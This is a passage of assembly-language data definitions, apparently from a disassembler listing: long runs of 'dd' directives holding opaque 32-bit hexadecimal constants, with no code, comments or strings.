		dd 2376FF90h, 5ACBE86Eh, 0F3E265B4h, 4B805C0h, 5F171D1Ah
		dd 7EED256Eh, 0AD451E9Ah, 5C0155Dh, 0C86B64B5h,	0B3BB06CCh
		dd 63544179h, 33DC2AE0h, 15DF4217h, 0E05AAE85h,	55FE4F33h
		dd 12AF3765h, 68E10349h, 0D48EF5E7h, 357C4D36h,	0F8AA72B2h
		dd 6189EE48h, 268BFB3Eh, 0FC368234h, 0DBBD81E3h, 0BA54BBAFh
		dd 48D4662Ah, 9CB475E2h, 62AEEDBEh, 0EFB61642h,	12CD37Dh
		dd 137D2AFEh, 53224BA1h, 29BCCA6h, 5D61F5DAh, 452A6138h
		dd 5A2651Eh, 76E2189Fh,	0C165D33Ch, 27C14E84h, 54AFF229h
		dd 2A36F557h, 0F24B1607h, 0A6AC8DB5h, 0B4EB155Ch, 0ADD45D11h
		dd 98B85751h, 755A5F5h,	9F710E64h, 14E1D9D1h, 0D581540h
		dd 9D2FBECFh, 8F2C7FD9h, 52A5166Eh, 12EF0778h, 0F42ED731h
		dd 0B7518357h, 0EEDC0011h, 731555CEh, 0E1A3608Dh, 4BE8CC2Bh
		dd 0B6967615h, 729616E3h, 9CC8C34h, 0DC4745CDh,	72326404h
		dd 2F50F575h, 93C2AFE4h, 0BBB0EB47h, 0EC8DD5ECh, 0B9C741F9h
		dd 9AA917FBh, 30923987h, 0FDD7395Ah, 0A6BF5D4Eh, 0BB1761B8h
		dd 6BD2AB8Eh, 1841F050h, 1E98CEE8h, 0B30AADB6h,	0D77392F4h
		dd 0CE64BC18h, 0F565D33Fh, 695E416Fh, 0D2835688h, 0E87E0955h
		dd 8C31B0FEh, 0E1742FD1h, 0C5CB78A1h, 4A7B8AEEh, 90BF6771h
		dd 4D1DB736h, 0A2AA689Eh, 0E4D3148Dh, 381F61C4h, 35CEFEABh
		dd 790F4543h, 7A6CEDF0h, 951A6D12h, 0E6FECED8h,	4A871CD2h
		dd 0F0BF0888h, 0B3452758h, 598CEEE3h, 0B1F9F06Ah, 3602238Ah
		dd 0DEB457DEh, 0CBB44709h, 5FD158ABh, 9CD46314h, 0DA7D5738h
		dd 0C3579A9Ah, 707983A6h, 0FE9287E3h, 0AF6641DAh, 2811C500h
		dd 28202E81h, 65EA6E09h, 5A9C68C3h, 1B9BBD54h, 0FB3C48B5h
		dd 95BF458Eh, 924FEDD6h, 97F12F54h, 0BD6FA0FCh,	0D3B955EBh
		dd 79A8A048h, 26156D0Ch, 980EC887h, 0B0E91398h,	0C1BF51DFh
		dd 613C67A3h, 0F909EEE6h, 4B781E5Ah, 2AF737Ah, 8B19540Eh
		dd 42BFE573h, 40846149h, 4DD28B2Dh, 5137AA94h, 0F6AB9D1h
		dd 8F5DBDFCh, 0C3731F22h, 1AA344F3h, 505D40BEh,	87744458h
		dd 11241728h, 58416C3Fh, 0F5456BE4h, 8C9CAA7Dh,	40A07B47h
		dd 0BBBA2857h, 36FA68D6h, 0F2C3FB0Eh, 258C81C1h, 6C62D523h
		dd 0D8BE4FD8h, 78D527A8h, 9EDA33B9h, 520A2B2Dh,	0DB8F84BBh
		dd 464FF1CAh, 294C474Eh, 0FCE92284h, 0F2259337h, 287E7400h
		dd 0CE2C54A0h, 0F6AF9D7Bh, 0D53B8EE7h, 3AA2EC90h, 36CB46AAh
		dd 0A6565B59h, 208BB3Ah, 0C58E9DF6h, 5F5A4296h,	0D83A1501h
		dd 8CC95DBFh, 43CE6AEEh, 0D119FD37h, 89A75A3Bh,	6ACDF3EAh
		dd 11D467CFh, 5F897E5h,	0EE66683Fh, 7DE5BF9h, 0AFD30D9Dh
		dd 0B455BD79h, 0CA48E5C2h, 0B23DB131h, 0C42A4872h, 0AEB60C45h
		dd 0CCB626C7h, 470AC517h, 0A30BF6ABh, 0DB3A8D55h, 5D24DF58h
		dd 0E8BB7585h, 0FBA26715h, 78555A98h, 33FE9E59h, 0F3BBDE27h
		dd 517A7468h, 56E84EB6h, 65B4AA70h, 5CBED89Bh, 93B5BDACh
		dd 0A22AD11Eh, 984BA34Eh, 9F88BBC6h, 20E3C399h,	0D7C72E4Bh
		dd 6E8CD968h, 0E7B55435h, 560160DCh, 0E3393BCAh, 874E26Dh
		dd 0F70E667Ah, 91CCC15h, 325F225Bh, 0E1AC3F17h,	583D5010h
		dd 0FAB52291h, 50F27F03h, 8579ECE1h, 0E1E7582Fh, 2EBDC062h
		dd 829C177Fh, 60E75788h
		dd 0BD846870h, 0BCA318Bh, 0CEB6E129h, 0A18F89B1h, 0CFA24E64h
		dd 0CA03AE1Bh, 75FB2D06h, 43A2C731h, 0D436248Dh, 5CFFAA9Ah
		dd 0FD773CE5h, 316DB6F1h, 60B89C1Ah, 0C80BFBF0h, 3072ACF4h
		dd 0EACB7AD1h, 5EFB5830h, 0C58404E1h, 90F0BF11h, 4F5C8239h
		dd 249FCE8Fh, 0B40C9B7Dh, 0A3B9EE02h, 8ADE52D5h, 869114D6h
		dd 5451DD64h, 0E2A2715Dh, 9D6A4B44h, 0EFA10874h, 0F8AAF7D8h
		dd 0DDAFAA49h, 496CEB39h, 36BF9024h, 863DCA29h,	0EC1A8A05h
		dd 8851FEBh, 0FFAF27h, 0BB975FEEh, 0D58E8E44h, 5D6C79E8h
		dd 14B82781h, 0FC7ECA80h, 5AE9D833h, 7AED1292h,	9E0685FDh
		dd 3D58F447h, 1D961028h, 0A6AAA17Eh, 0BD504342h, 0B2EBB430h
		dd 2AFE934Eh, 0BFDEF562h, 3ED3CB8h, 265714EBh, 6E34D164h
		dd 495DD5D5h, 0E556562Bh, 6ED6847Dh, 0E729B58Fh, 550B2157h
		dd 5A1511Ah, 55C44E3Ch,	0EEA0C008h, 44DD5372h, 0B5A57C4Eh
		dd 0BAB14965h, 0F2741EC6h, 0E94E061Bh, 1AAEED17h, 0DD5F0156h
		dd 0F14D50D0h, 5AB5C2E6h, 0FAF6729Dh, 0CFA3A3DBh, 82AE1F57h
		dd 24B9A379h, 0CE2D2CC5h, 950AD594h, 79F5A289h,	9F51DA7Dh
		dd 178EEB8Bh, 3FD1094Bh, 7FD995DFh, 4574E360h, 0F96A0D0Eh
		dd 0C4CB4DADh, 682DCBFEh, 0FB1C12B7h, 0EA1B1521h, 5FE4CAF2h
		dd 6FC2B02Dh, 0A9EA10FCh, 0A092CEF5h, 783CBE99h, 0A30BC3CEh
		dd 0E79758CDh, 272006D7h, 4C9B479Ah, 0A13DC5C1h, 0A1925570h
		dd 5908FE65h, 81B2BBDEh, 9DA9FD58h, 7E2A37D5h, 8F45D494h
		dd 1944AC5Eh, 1BC027D3h, 5B944177h, 0F9B799F3h,	52ABE123h
		dd 0C64A57B0h, 0C0B381FAh, 6C8E42Dh, 4B16EA7Fh,	66D03D81h
		dd 188ADCBAh, 11CDD745h, 4A77FA2Bh, 3C87AAA1h, 369069EBh
		dd 75CB0F1h, 0B2EB2AFEh, 6E88DA4Ah, 759EC014h, 3B5B1B1Eh
		dd 65A3F299h, 9C3A9857h, 8078CB1Ah, 60F6A9C4h, 553EF8DBh
		dd 43FA38B7h, 0FF1366A7h, 0C1D7112Eh, 0B385A69Ch, 452B3ECAh
		dd 4669F9B3h, 6E654EB3h, 0D9DD2931h, 47077DE4h,	92F039CFh
		dd 0BE55632Bh, 7787A086h, 83A69A2Dh, 42E503EAh,	0B96AAE57h
		dd 8CEB2240h, 58B4BBC6h, 987E9649h, 9A405E29h, 240BCAEAh
		dd 3989AADBh, 0B34BAA8Bh, 0A224916Ah, 94C6DD94h, 0F5AFA03h
		dd 0BA779C6Ah, 75DAA768h, 0C8EF3CBBh, 0F0E24E4h, 0F1421D8Eh
		dd 4AD52F68h, 5D5FDC50h, 0E4613AA3h, 67FBE534h,	0F9CCC06Ah
		dd 0B302F81h, 0FC37277Dh, 35925248h, 6780526Bh,	0B6B7AFE6h
		dd 5781EB2Ch, 0B4624385h, 7D98E98Ch, 0CE47FF8Bh, 0DF57683Eh
		dd 0D6C25804h, 5B0D8617h, 3B5A9302h, 0DB898072h, 5CA46522h
		dd 8BF6ADB4h, 0B353F3E8h, 0FC54417Dh, 0F94FB1E5h, 0D9385F1Fh
		dd 32E064D6h, 0EDEA6AF8h, 6F3222C2h, 728B311Bh,	56A01878h
		dd 0FDC2A477h, 3DA6A5C6h, 0B1D9FA2Ah, 5F4FC6CAh, 57F585Eh
		dd 2EBDD624h, 0A39B7D0h, 73856BD6h, 0A08B3052h,	0BDD25612h
		dd 578F55DDh, 0C72FEF2Ch, 0D4E0E2BBh, 233A7F7Bh, 585D2581h
		dd 998634DAh, 0C002A235h, 0ED65E1D5h, 301A6166h, 0C1D8BFAh
		dd 0F68B2EFCh, 0C0837CB3h, 8CABC5DDh, 4597898Ch, 0BADF8063h
		dd 7504D2AAh, 2661E9A0h, 978ACACDh, 5C3538E0h, 76BBDA2Ch
		dd 0AB93A612h, 25555647h, 6D433BC4h, 8AE1CC24h,	15DD5BECh
		dd 15EFA565h, 0B8138CEEh, 59AC7865h, 8C487FF2h,	4F7AB82Fh
		dd 0F80AFB9Eh, 55FD1FC2h, 6C836813h, 19A709E1h,	0ADDD45F3h
		dd 252FC376h, 5314A1F8h, 0FAF80020h, 4EE6897Dh,	0A21812FBh
		dd 0CDA2F8D5h, 79B0EF86h, 0D8F79D70h, 0C3CE7C0Fh, 0EED4AEF5h
		dd 82B0884Ch, 0B8DD9407h, 5B99F1F0h, 0E3D06FE0h, 0DAA2BF1Ch
		dd 23FBF15Bh, 0A882AB84h, 2AEB2FDAh, 0B5B2E942h, 0D823053Dh
		dd 4BBD29FCh, 37914F6Bh, 0A9E30E5Ah, 1B76216Bh,	6147A1F8h
		dd 0C4EE71DCh, 452A7044h, 0F29F72BAh, 0AD932AE9h, 5C0F68CCh
		dd 0F3EA2A79h, 7DE8BE25h, 96022866h, 7DC2BEBBh,	0FB5107C7h
		dd 0CCF7CAA1h, 3A5004BCh, 700CB0A4h, 8E4DDC66h,	0AE4E281Fh
		dd 6EFE177h, 7258D527h,	5BFE5CE7h, 4D1CB156h, 0A83AEBEDh
		dd 91CC9C3Eh, 4FE490DAh, 0B9559723h, 395650D7h,	7757BDADh
		dd 3A28CEAAh, 6781569Fh, 44EF9FDFh, 92BEE55Ah, 0B8E986A5h
		dd 93148C0Fh, 2B64AF07h, 2039FBF0h, 0F0AE65B7h,	0DEAAD2C6h
		dd 0B8C836D8h, 0C660F561h, 60603C67h, 0EC49CD2Bh, 0EB788241h
		dd 1667DF64h, 0E395EB6Ch, 0C85D30D3h, 48063983h, 0A3B3DF7Ch
		dd 0A5A417F0h, 0C40E5A34h, 6E261EFAh, 0C3AC0BF1h, 0AA7255Dh
		dd 0FB0CBADBh, 87711A8Bh, 5139ABF7h, 103D115Fh,	0ABCD3F9Ch
		dd 0EF39BA4Ch, 18D5B854h, 2C91EF38h, 36F61CC3h,	8A98EA2Ah
		dd 7BBFAA8h, 0CF32FC86h, 55A34AC1h, 0CC4D8BEAh,	9FD34B1Fh
		dd 0AFC3155Fh, 0A1CAFD26h, 9E0AF0C6h, 68C33BB5h, 0DC7CE56Dh
		dd 0D5B37AECh, 0E7F50F47h, 2BA0CC2Bh, 0D4C8D691h, 9B868B52h
		dd 0EE843D7Bh, 47C32AE4h, 0D62E15A9h, 8DB44947h, 5FE54D10h
		dd 0DC7F4688h, 0C512CEFBh, 955D8EBCh, 7974D2E9h, 0AB5A1C52h
		dd 0EB2DE314h, 0DCA92659h, 821736BCh, 0C7BD3469h, 0B9089F5h
		dd 0B6A0022Ch, 9A4B9FB5h, 0CC51D547h, 545A0F29h, 13CC00BBh
		dd 699F75AEh, 36425A8Ch, 0B539D03Ch, 0FEA79742h, 585B76D5h
		dd 0FC254BFDh, 0D1A9BAB0h, 0B532A89Bh, 591B0AD3h, 0CEF42A71h
		dd 7B7F7834h, 0D4096D4Dh, 48AA8BB9h, 42FBE417h,	0D9EFF9B4h
		dd 70960093h, 0FA4D2FE8h, 0F479EB42h, 0F03D9B5h, 6E716B6Eh
		dd 0F225C7E8h, 8FA5BD36h, 0F68B16E1h, 47474D6Ah, 63C1172Ah
		dd 0C6505D4Eh, 0F4E9C38Bh, 53C2893Bh, 0EB0D8793h, 5426C739h
		dd 9E0FCEC7h, 0F7EB257Fh, 74048233h, 235DAEBAh,	215DAB18h
		dd 224D3B47h, 49020FDAh, 6F3AD643h, 0C42FFD1Ch,	0B46C771Dh
		dd 29E6A006h, 0A72972BAh, 846B0BDCh, 0B120907Eh, 0E7450EC9h
		dd 31EE247Ch, 0DC36CFD5h, 0EDCDFCA8h, 0E6A8E04Ch, 942A5FFAh
		dd 0E9EB5A38h, 0C0FA9779h, 661675BCh, 6A1CBD06h, 0FFC11A3Eh
		dd 0C640AAF8h, 89BF6BC1h, 44E3FAB6h, 548D916Ah,	0B88AEFC6h
		dd 1CBBE1ECh, 1A7FFA87h, 220FECD5h, 0DB08F85Dh,	0D4342646h
		dd 1947A1DDh, 0F2936B34h, 0C2132097h, 6DC0D26Ah, 57E520ACh
		dd 0C6F1C33Eh, 9E571A2Fh, 0BD7A4774h, 7E1FF841h, 2AE8DDFEh
		dd 0A040ACB7h, 0C13FC158h, 0D1B52B88h, 0BB3A120Bh, 0B98FD660h
		dd 35921141h, 0BA1DBF94h, 3E987002h, 0A981B824h, 0FB5B95B6h
		dd 0C1C1E748h, 5AAA4D9Ah, 0B2CF6CC4h, 0C8575FC5h, 0C3372BCh
		dd 0B288FFB3h, 32FA54DEh, 0C9CA9FEFh, 0FDE93313h, 0F0708D8Dh
		dd 0CA1DF07Ch, 0F59121DEh, 6445ABEDh, 3BEF0F55h, 57F017DEh
		dd 4A8BDD9Dh, 58D0C195h, 0F5F99D6Dh, 9C81F87Dh,	0BF6E75E0h
		dd 0B317654h, 36FE5630h, 0FA7F39D1h, 67BEAFEDh,	1E57A9DBh
		dd 249DA90Fh, 8B2DCA6Bh, 3D14BBDDh, 4B4DF144h, 2DCF7278h
		dd 0C291F5FDh, 2058F19Bh, 0DD74E7C1h, 0F73F9D64h, 0A4F253CFh
		dd 0C72D1CFBh, 0FD563F4h, 5790EAF9h, 0DBC86EEBh, 0F9B19F08h
		dd 7D7BE04Eh, 4E5E62AAh, 38B482F8h, 0E44C2259h,	0EDDD0E7Ah
		dd 0CFCB77EFh, 549FFB17h, 0FB2FF3E5h, 0D692FFBh, 92FEF442h
		dd 0E3BE3619h, 0A9E30A04h, 2264B62Dh, 12988CC7h, 517BA6FBh
		dd 0B35089C7h, 5FD111A3h, 8A042C84h, 459B3FDAh,	0DA396FD1h
		dd 0ED2060B0h, 12BD481Ah, 0DB50AA19h, 0BB9CC511h, 0AF2F856Ch
		dd 2C0492FCh, 0F2215ABBh, 5BDC88D7h, 176EBF07h,	9E55570Fh
		dd 83EDCBC9h, 0F8736073h
		dd 0A588C7Dh, 7A853DB6h, 630F0C39h, 49DD4AD0h, 4F17ACDFh
		dd 60F9FC6Bh, 50607F5Fh, 49F17078h, 0A3F2ADFDh,	3468305Bh
		dd 2E3B4A44h, 5C72B4C8h, 189C5D4Fh, 8214B42Ch, 2535843Fh
		dd 2E5F8EF2h, 0AC14ADDAh, 0FCD59F17h, 0F2856616h, 0AB08415Dh
		dd 0CDF50492h, 1C509A2Bh, 0ADE8B8Eh, 44E05BD0h,	0BC796C89h
		dd 0EFDD4979h, 1F0D9185h, 90766B38h, 0D0940E93h, 0C4767308h
		dd 14598A6Fh, 0BC137DAh, 2EF4663Fh, 0F7510393h,	72E759CFh
		dd 0FBD7ADDFh, 0CF8D77DDh, 977C12Eh, 2D91D7E8h,	0F9CCD017h
		dd 8DAF20B5h, 0D304B712h, 3DC01694h, 0FFF66AE3h, 7C9BA53Eh
		dd 0EB66BD6Dh, 4C511514h, 70E9D64Bh, 0FE8D34E2h, 0FDAC5E32h
		dd 0E592366Ah, 79F0489h, 5A714931h, 5BFB8415h, 4F8B2DA0h
		dd 0BDCCFF01h, 0E5F6DC02h, 0F55B22AEh, 0C7445E78h, 0B00E44C3h
		dd 0A5875875h, 50B4FE60h, 8F235E76h, 6A2F59A4h,	66A04AEAh
		dd 16AA90B3h, 323AA4E1h, 1FB7D4B6h, 140A9799h, 0B6150809h
		dd 0BD671DB3h, 0FD4804EDh, 60DDCC3Ah, 14E2B453h, 31564E60h
		dd 81F7F6BCh, 34B8963Eh, 7CCA206h, 15EC3EBFh, 85D1E83Dh
		dd 7BEE2E80h, 0E7F2D784h, 0CB7E929Dh, 0BECB44A6h, 2D0FEA0Ah
		dd 0FDEB8B61h, 0FD2AD189h, 7DDFC69Bh, 0F06C67F0h, 0BFDFD7BDh
		dd 0C9D2AFC3h, 0BA9E60ADh, 0BBBC37BBh, 554E5D5Eh, 0BF59FD75h
		dd 57CDFB3Bh, 0F82E94D7h, 67F4D6E1h, 783EF719h,	40C59246h
		dd 0A919F850h, 93C96515h, 0C7575F82h, 5599EA8Dh, 721D5288h
		dd 3AA60F97h, 0E1CF5A7Ah, 0AD6867D4h, 0F2E07CF6h, 0FED63739h
		dd 53826BC4h, 0A394AD75h, 14A3AE23h, 0A1A4167Fh, 68AB8595h
		dd 9D256F8Fh, 0ED39C434h, 3E1517ACh, 75D3F616h,	5B263AB7h
		dd 0F88E482h, 7CBBF2D5h, 0F7DBABF6h, 66339817h,	0E4A9B37Dh
		dd 69B1BFD4h, 0C54EC47Ch, 997F3B1Eh, 3BF8828Dh,	7C6AD24Eh
		dd 87F987E3h, 0FC4AE039h, 63F46078h, 70BFC4C5h,	3F158E66h
		dd 0A85A101Dh, 0A438B511h, 2E970CECh, 52BBA7AEh, 7DD29D4Fh
		dd 5A180CC7h, 7BD8CE76h, 6ED4E7D3h, 0D9D48489h,	8C912128h
		dd 20C93757h, 9EF8A828h, 0B0FD65EEh, 2F20EAF1h,	7599674Ch
		dd 35BA8B5Ah, 7D103EF8h, 4B944EE3h, 17051DD7h, 68824E30h
		dd 0D8BFC43h, 36BDABCAh, 887753F5h, 0CCF4A52Eh,	0F2A9D8BCh
		dd 53594AD1h, 801D2EA4h, 6BF0A77Dh, 0C6A4A07Dh,	8FAAFC0Eh
		dd 1357B938h, 52B3135h,	43F3D755h, 0C84B47D1h, 8774BCB2h
		dd 9C4BA78Ch, 5DD2142h,	575351D2h, 0E4D75FF5h, 8FAD882Dh
		dd 0BEFF87F1h, 0B55430C0h, 181FBA19h, 0ABA84723h, 0D18DBEEEh
		dd 65E99C36h, 90FCEEC9h, 0D61D5AA0h, 1C1B7F92h,	95FB0A66h
		dd 0A4D82E57h, 0A62D5094h, 0ACC9F5CEh, 4259515Dh, 0CE5A37F1h
		dd 0BEB07AE4h, 0CE480DF4h, 3928FAC0h, 678B64F8h, 0CB6092CFh
		dd 0FCA0A8D0h, 703F4FE7h, 0F55F9930h, 7FB8B67Ah, 8C4A6699h
		dd 1CB4B288h, 2AAE18ABh, 0A532F968h, 894BEFF2h,	251F029Eh
		dd 11CA4656h, 8953902Eh, 7CA6402h, 0D6F7EE8Ch, 481C88ABh
		dd 7BE1FB6Fh, 0D7168B64h, 81E38F4Ah, 87758C6Bh,	2CADCDABh
		dd 0BE9E1B3Dh, 0C6E66E54h, 0AE9E8A4Eh, 1FDEE558h, 76803835h
		dd 0AC55ED31h, 0D3F0651Dh, 0FD6617EFh, 0C4BB16A6h, 0C44A7D27h
		dd 3434890Fh, 0B8D2E38Ah, 7CAAD27Dh, 6BA7E5B5h,	8D2595A3h
		dd 667E0081h, 1C8F54F8h, 31FFC7Fh, 3DD4B89h, 0B88ED73Bh
		dd 7DB3D6C2h, 0B56AF00Dh, 1576D7AAh, 0F73FBD4Ch, 0C7E0D64Dh
		dd 7DBE1128h, 20E94B79h, 0F710BB48h, 32EFBD0Eh,	173CAA0Ch
		dd 795C788h, 7C68EB96h,	9D585DD5h, 9ADEEA41h, 200BDF16h
		dd 3BEC95D2h, 243C3FAAh, 7E74AA75h, 7AD51EE1h, 0AB779E3Fh
		dd 37FDC0E6h, 515627DBh, 9991C4BEh, 6C09DCE3h, 0DDFC95F5h
		dd 0EEA141B3h, 0BF1446A0h, 0F4E0F80Ah, 19CC651Ah, 8D8BF2A2h
		dd 0C4420FBAh, 949DF26Ch, 993B357Dh, 0BF067D7Bh, 0A3B976BFh
		dd 0EB923753h, 0A9057B5Eh, 71EC38EBh, 0EB7F7078h, 0B9A0FAFh
		dd 7284EDDEh, 0C598C5D2h, 69EFC1A7h, 1BA687E1h,	6562F01Bh
		dd 3D5F2CC4h, 0B485E05Fh, 1B7301ACh, 571F75E8h,	452748E7h
		dd 8F95EF3Bh, 8C066ACBh, 0D4634AF3h, 0BB46596Ch, 74387CBCh
		dd 10ECEB95h, 54A3BA0Fh, 0B0D4AE5Ah, 0F81FC93Dh, 1BF264E5h
		dd 15C3CE9Fh, 0B660BAE2h, 4281A72Ah, 0B5BBAEADh, 0F21D93A9h
		dd 2211DC35h, 6C770FE9h, 0AC25B474h, 0AD80BBF2h, 0C70D4CB4h
		dd 0B3614745h, 0A368566Dh, 61FEC942h, 0DDB6CBEBh, 0E3716ACBh
		dd 8BEBD960h, 323D144h,	0B5A21FD2h, 0EE647FBAh,	0CBB03117h
		dd 0E8B5DDEFh, 0FD12B011h, 46BF48B6h, 0E33A353Bh, 0DA13632Dh
		dd 970ADD44h, 3EA51B24h, 0EAFB94EEh, 9496A289h,	0FC5D644h
		dd 0EEAB9E53h, 38C07523h, 41C20D9Fh, 0DD380C60h, 16CC9351h
		dd 8B472469h, 0FC56A03Dh, 9AD3F7E4h, 20AE990Eh,	63D896AAh
		dd 0D517318h, 2CE4C32Bh, 2573B712h, 53C96011h, 7641E7B7h
		dd 423E5974h, 0EC7BBC89h, 0F51444D7h, 531ECA6Dh, 8D740816h
		dd 15513B9h, 8B763CEEh,	6E0F6034h, 0BDB6627Ch, 2B8F8A23h
		dd 0A420ACB6h, 0AAFB57DBh, 0BA69981Ah, 9E5E9B93h, 374E9B9Ah
		dd 95536812h, 7851CB49h, 8DF7C870h, 0D7FDA81h, 2F963653h
		dd 0C1E0A8Dh, 0D19CCD0Ch, 3CCF5CDEh, 0AEC6885Dh, 0D1E05491h
		dd 8D5E7651h, 0EAEC0D15h, 0F996A76Eh, 0DCAAC0DAh, 6E39368Bh
		dd 9859B7EAh, 0F302D043h, 0FAFBC2FDh, 595CEDDAh, 3218DF15h
		dd 441440C8h, 9682457Fh, 0A6CDFB54h, 3EC795EFh,	5203EB41h
		dd 66492369h, 0B289D54h, 0D7188498h, 0D1DE1C77h, 0FD9DDA67h
		dd 0D4F9DFF6h, 0D6859818h, 0E560E0B9h, 89362353h, 21D85960h
		dd 5FF9E37Ah, 17F91F1Eh, 0DA03C19Ah, 1B19EBBAh,	0CCBF6B27h
		dd 0BB8745C2h, 0FC60DFA3h, 0A9F2A92Ch, 8C474BDFh, 15FDFD72h
		dd 75A7C3D5h, 0FDA85A21h, 0EDD4A412h, 906C5964h, 66062028h
		dd 989919CCh, 41C86E05h, 617DD19Ch, 0DDE3D010h,	4D39E0ABh
		dd 0C60E2B0Fh, 0E68C3B96h, 586B78EAh, 6887AC76h, 0A2C560F9h
		dd 2ECF55A8h, 5ED7DA9h,	0E0AE24FAh, 7A33B8C2h, 698F192h
		dd 0BD60111Fh, 16CC1865h, 5A675CAFh, 4BFCE755h,	31549405h
		dd 64B4897Dh, 0FB055741h, 94C67BAFh, 97775212h,	0E1D71E7Ah
		dd 893E82AAh, 0C0B3DA42h, 2CAAAC32h, 0EF631BFDh, 0C26B53CAh
		dd 0FF8DC891h, 898553D2h, 0C56AFF9Dh, 0E2956ACh, 1963BFA5h
		dd 0E6079F00h, 0D5E354ECh, 8BACCDD4h, 0BB1BB4A1h, 25EA57E9h
		dd 8096CE2Bh, 0CB643AE9h, 0BBA9ECA2h, 0F2AD262Eh, 1AAC82B3h
		dd 825ACB96h, 13862EFDh, 32726341h, 0ADBAEA5Ah,	0C79B2EC6h
		dd 10159303h, 0CD5ED023h, 8DB5489Bh, 0A5E20DCDh, 0A3290C5Ch
		dd 102DA82h, 7FA74AEFh,	0D760ECEFh, 1F777A25h, 4BC4772Dh
		dd 1B19F4BFh, 0F31F8964h, 45B71B3h, 646365A4h, 76DE6FF9h
		dd 0C3CD5C2h, 0CEAA453Ch, 5A6AAC97h, 6CA5D316h,	0BB6A2E5Ah
		dd 34EFA3A8h, 0C4A1B67Ah, 0D92B8CEAh, 0CCFE8AC2h, 0F566C101h
		dd 7DAD2581h, 92DA6D5Eh, 7C3AA377h, 0EFAC418Eh,	0DFF7519Dh
		dd 1D72E6E7h, 832B96D6h, 39A09629h, 2E10CAB3h, 80169703h
		dd 0A02BD5BEh, 0D034EABBh, 0FA25A074h, 81665B21h, 0E9B65EB2h
		dd 0C808AE78h, 0BF63D8D6h, 6E64C280h, 0B4C2697Dh, 89DC98ACh
		dd 0E8E64917h, 4D4AF64Fh, 2D9C5Ch, 7FDFB2B7h, 22161FC9h
		dd 93EF8180h, 3FCAF048h, 517BCAAAh, 0F0FCB9C0h,	4EEC2504h
		dd 939D7B44h, 7151FCE4h
		dd 0ED7F12EAh, 30FC6B48h, 0D21F4A48h, 3B8CA034h, 2DD95DEEh
		dd 7DD5BA86h, 0FFEBA660h, 226F8CE4h, 83C3877Fh,	7C75266Bh
		dd 48C98A60h, 53B3EEDEh, 0CEC7FDEh, 469A19A0h, 2DF917Dh
		dd 569BF67h, 94E3C84h, 686B5A04h, 0D9BFB68Dh, 57C86368h
		dd 5CE53672h, 4F32021Dh, 0A9DAAC48h, 26980B7Ah,	817514FDh
		dd 5D26BBCh, 0FD9BF180h, 2ED08AB5h, 0B91881BEh,	8882BF2Ah
		dd 792A974Eh, 0AC399677h, 0A0A8081Fh, 0ED165753h, 6D1B5757h
		dd 5AB6D7D1h, 0A8814B5Fh, 0EDE2E6E1h, 0C7357BEAh, 12F4406Dh
		dd 81DEC203h, 1CD0854Eh, 0D2784DA3h, 0CBB215D3h, 6CD23C98h
		dd 514135E4h, 5B48D9CEh, 90C0BB25h, 7ECDBF50h, 83CDF26Bh
		dd 0BA4B6F4Fh, 0D85A5E35h, 0E75BAE0Eh, 0BC900CCFh, 1ACCDEE4h
		dd 0D9198DC0h, 0CED8B6E0h, 0FB9957FAh, 7BEA6A95h, 0F2F0ED3Fh
		dd 0A3A58953h, 2CD07DCEh, 0A04127C6h, 0CCF96BAEh, 0F7EF13E0h
		dd 1C6EC07Bh, 0DD552CD5h, 0D674E623h, 7C5562EEh, 75BF479Eh
		dd 0BEF5740h, 2AC2D32Ah, 0D1EE5D15h, 231BFD6Ah,	0FCDCBBABh
		dd 61BC6ECAh, 0DA79FACh, 357B4E02h, 0D6B45B42h,	46A088EDh
		dd 0E781B636h, 0B5D548B3h, 4D2186A3h, 5AABC7CBh, 2EC21C59h
		dd 1E5BCAF1h, 56B2C3E6h, 90EB9042h, 85F6C132h, 58B4699Bh
		dd 194B169Eh, 41823C35h, 0A61B542Fh, 0C0C22FE8h, 2ABAB874h
		dd 43E7A7CEh, 0D483F900h, 59E1CEE8h, 803D3BDCh,	0E9182CDAh
		dd 7B15D5CDh, 0C96A3F45h, 7B1AA131h, 0EB5E86AEh, 96EDCCE5h
		dd 0AABF9E48h, 0AF87A192h, 0B7E2C3E8h, 0FC440D7Ah, 0E166770h
		dd 0EB89C6B6h, 0AA3E8A23h, 0DB3789DFh, 0FF89ECACh, 491A2EAAh
		dd 0C1C0827h, 0E16E9B2Bh, 936EA2ECh, 898A7822h,	28DE7F50h
		dd 9F55B749h, 0A7803D7Ch, 0D1BFC553h, 9282E6E1h, 7EA8D915h
		dd 53665122h, 33A02E15h, 0CBD6CF68h, 0D5213362h, 0DCB55DF9h
		dd 9143BF9Bh, 0F5D5FD2Fh, 4553CC89h, 0BEA3C05Ah, 0E85402DAh
		dd 0ADE68789h, 0FB636D10h, 63AEFA40h, 575D50FCh, 4A6CCD15h
		dd 0E2C368AEh, 0D96D58B7h, 2096BDD7h, 6C505430h, 91F4F1Dh
		dd 0B890681Eh, 535CA86Ah, 70E1FC4Eh, 4A1A52Bh, 0A3CB783Eh
		dd 0DFA576F3h, 35D1ED50h, 7DD77EC6h, 0D3EF5AE7h, 0A6F9354Ah
		dd 8571D7A8h, 0B1475FF9h, 0F1022B1Eh, 0A32CE29Fh, 7F55CE0Fh
		dd 3C144E57h, 0F7F654D6h, 4B36BA45h, 0EE6E1314h, 0CC6A2636h
		dd 310FDEDEh, 5EDB8EEh,	0F7E8AD2Fh, 336ADAFDh, 0B8AEBEA9h
		dd 0E93B612Eh, 0A692A5A2h, 80395D62h, 0BD9761C0h, 9CB43DBCh
		dd 65A9CAADh, 0A5E628F6h, 0EA0EF800h, 7F94F861h, 95F51B95h
		dd 78B79B81h, 0AE555620h, 0E275DE09h, 0CCBF25FFh, 0AEE41D41h
		dd 95E2C360h, 1E7FF590h, 56864CCFh, 0CB2A4BA7h,	23F09D1Bh
		dd 2ADF1266h, 0BE4FE844h, 1571EA42h, 2F85605Dh,	0CA02F29Bh
		dd 8DA6B50Fh, 680EAA79h, 232F5CBFh, 17485F0Bh, 7D6A91FEh
		dd 6485D6E4h, 0EE8800F3h, 0D55F7A15h, 0B3820A63h, 0DA3ABF16h
		dd 7862B5F7h, 15DF349h,	0FF2675D4h, 35F40D55h, 258A2C6Dh
		dd 5D02D86Bh, 0EF5FCF76h, 0FC948943h, 561E4078h, 0BC6D963Fh
		dd 8A16643Bh, 7BD6259h,	0F89907D7h, 0F7EAE6A8h,	2BCE8569h
		dd 7D648B33h, 0C08BAE9Fh, 283BC5B8h, 0E3FF2C13h, 41058CC4h
		dd 0C6AA8BACh, 273FB2D1h, 0F9E02E49h, 6E6B0533h, 87A77CE5h
